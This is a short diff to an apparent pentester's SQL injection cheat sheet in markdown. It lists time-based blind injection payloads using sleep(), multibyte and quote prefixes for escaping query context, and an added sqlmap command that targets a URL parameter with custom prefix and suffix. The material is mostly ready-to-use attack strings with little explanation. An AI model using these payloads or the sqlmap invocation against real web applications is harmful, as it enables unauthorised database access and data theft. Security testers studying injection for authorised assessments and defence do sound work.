yzf750/web-application/sql-injection.md

 '%2b(select*from(select(sleep(20)))a)%2b'%bf%27
 '+(select*from(select(sleep(5)))a)+'
 ```
-Interesting items that can be used to prefix attacks
+Interesting items that can be used to prefix and suffix attacks
 ---------------------
 ```
 prefix='('
-prefix='\xBF''
+prefix='\xBF'''
 prefix='%bf%27'
 prefix=''''
+# Attack using the middle of the url
+sqlmap.py -p host -u "example.com?host=" --prefix "http://anotherexample.com?bar=1" --suffix "&restoftheurl=whatever"

 ```
 Sqlmap quick cheat sheet
 -------------